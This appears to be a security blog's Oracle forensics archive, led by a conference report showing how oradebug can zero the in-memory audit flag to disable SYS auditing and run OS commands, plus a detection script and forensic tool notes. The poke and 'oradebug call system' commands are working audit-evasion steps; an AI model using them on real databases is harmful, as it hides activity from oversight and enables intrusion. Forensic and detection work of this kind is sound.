Archive for the ‘Forensics’ Category

Disable Auditing and running OS commands using oradebug

Saturday, September 17th, 2011

Currently I am staying at the Hacktivity 2011 conference in Budapest. I talked about Oracle Forensics (pdf of the presentation). The second talk was given by Laszlo Toth. He showed a lot of interesting things, e.g. how to disable Oracle Audit and SYS Auditing using oradebug. His presentation will be available soon on his "sooner or later" webpage, soonerorlater.hu.

oradebug is a feature, undocumented by Oracle, that is present in all versions of Oracle and allows powerful activities if you have SYSDBA privileges (and getting SYSDBA privileges is easy as a DBA). Its peek/poke statements allow reading and modifying the memory of the database:

Sample – disable Oracle SYS Auditing:


sqlplus / as sysdba

SQL> -- get the offset for oradebug

SQL> select fsv.KSMFSNAM,sga.*
from x$ksmfsv fsv, x$ksmmem sga
where sga.addr=fsv.KSMFSADR
and fsv.ksmfsnam like 'kzaflg_%';

KSMFSNAM         ADDR                   INDX    INST_ID KSMMMVAL
---------------- ---------------- ---------- ---------- ----------------
kzaflg_          0000000060031BB0      26652          1 0000000000000001

SQL> show parameter audit;

NAME                                 TYPE        VALUE
------------------------------------ ----------- ------------------------------
audit_file_dest                      string      /u01/app/oracle/admin/PSALES/adump
audit_sys_operations                 boolean     TRUE
audit_syslog_level                   string
audit_trail                          string      DB, EXTENDED

SQL> oradebug poke 0x60031bb0 1 0
BEFORE: [060031BB0, 060031BB4) = 00000001
AFTER: [060031BB0, 060031BB4) = 00000000

oradebug can also be used to disable standard auditing. oradebug makes Oracle products like Oracle Auditvault nearly useless because Oracle Auditvault relies on Oracle native auditing. A (SYS)DBA can switch off auditing for a few seconds, perform activities without being audited, and switch auditing on again.
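A defender-side consistency check for the session above, as an added example (not from the original post or from Laszlo's presentation): it parses sqlplus output and reports when auditing is configured but kzaflg_ reads 0, or when the value differs from a recorded baseline. The sample output is constructed from the session shown above, the function names are hypothetical, and the only flag semantics assumed are the two values seen there (1 with auditing on, 0 after the poke).

```python
import re

# Constructed sample sqlplus output, modelled on the session shown above.
FLAG_OK = """KSMFSNAM ADDR INDX INST_ID KSMMMVAL
kzaflg_ 0000000060031BB0 26652 1 0000000000000001
"""
FLAG_POKED = FLAG_OK.replace("0000000000000001", "0000000000000000")
PARAMS = """audit_file_dest string /u01/app/oracle/admin/PSALES/adump
audit_sys_operations boolean TRUE
audit_syslog_level string
audit_trail string DB, EXTENDED
"""

ROW = re.compile(
    r"^(kzaflg_\w*)[ \t]+([0-9A-Fa-f]+)[ \t]+\d+[ \t]+\d+[ \t]+([0-9A-Fa-f]+)[ \t]*$",
    re.M)
PARAM = re.compile(r"^(audit_\w+)[ \t]+(?:string|boolean)[ \t]*(.*)$", re.M)


def parse_flags(text):
    """Return {variable: (address, value)} from the x$ksmfsv/x$ksmmem query output."""
    return {m[1]: (int(m[2], 16), int(m[3], 16)) for m in ROW.finditer(text)}


def parse_params(text):
    """Return {parameter: value} from 'show parameter audit' output."""
    return {m[1]: m[2].strip().upper() for m in PARAM.finditer(text)}


def audit_flag_findings(flag_text, param_text, baseline=None):
    """Compare the in-memory flag with the configured audit parameters."""
    flags, params = parse_flags(flag_text), parse_params(param_text)
    if "kzaflg_" not in flags:
        return ["kzaflg_ row missing: query failed or output was altered"]
    addr, value = flags["kzaflg_"]
    findings = []
    # Auditing counts as configured if either parameter from the session is set.
    configured = (params.get("audit_sys_operations") == "TRUE"
                  or params.get("audit_trail", "NONE") not in ("", "NONE"))
    if configured and value == 0:
        findings.append(f"auditing configured but kzaflg_ at {addr:#x} is 0")
    if baseline is not None and value != baseline:
        findings.append(f"kzaflg_ changed from baseline {baseline:#x} to {value:#x}")
    return findings
```

Because the flag can be switched back within seconds, a poll of this kind only catches the change while it is in effect.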

Another trick from Laszlo’s presentation was how to use oradebug to call OS commands via the database:

SQL> oradebug call system "ls -la >/tmp/hacktivity.txt"

Later I will talk about Laszlo’s trick for disabling the Oracle authentication using oradebug.

Blackhat Training "HACKING AND SECURING ORACLE (2 days)"

Wednesday, April 13th, 2011

Oracle Java Forensics

Wednesday, March 31st, 2010

Paul released a new article about Oracle Java Forensics. He describes how to find traces of Java attacks (e.g. via dbms_jvm_exp_perms) in the Oracle database.

I’ve got some nice ideas from Paul’s article.

Well done.

David Litchfield has published a whitepaper on Oracle forensics

Thursday, November 27th, 2008

David Litchfield has posted a new whitepaper "Using the Oracle System Change Number in Forensic Investigations". He also published 2 tools called oratime and orablock. Oratime converts an SCN to a timestamp.

C:\oratools>oratime 671406483
21/11/2008 21:48:03

The second tool from the whitepaper, "orablock", can extract data from a data block.

C:\cadfile>orablock
Orablock v1.0
(c) David Litchfield
(david@davidlitchfield.com)
-h (show help)
-f data_file (required)
-c column_template
-z block_size (default 8192)
-o object_id
-b block_number
-s seperator (default newline)
-a action
Actions are:
A DUMPALL
D SHOWDELETED
O DUMPNOTVIAOFFSETS
S SHOWDELETEDNOTVIAOFFSETS
C DUMPSCNS

David’s Whitepaper about Oracle Forensics

Sunday, August 12th, 2007

David Litchfield just released the 5th part of his Oracle Forensics whitepaper, "Finding Evidence of Data Theft in the Absence of Auditing". He describes how to find traces if the attacker used only SELECT statements.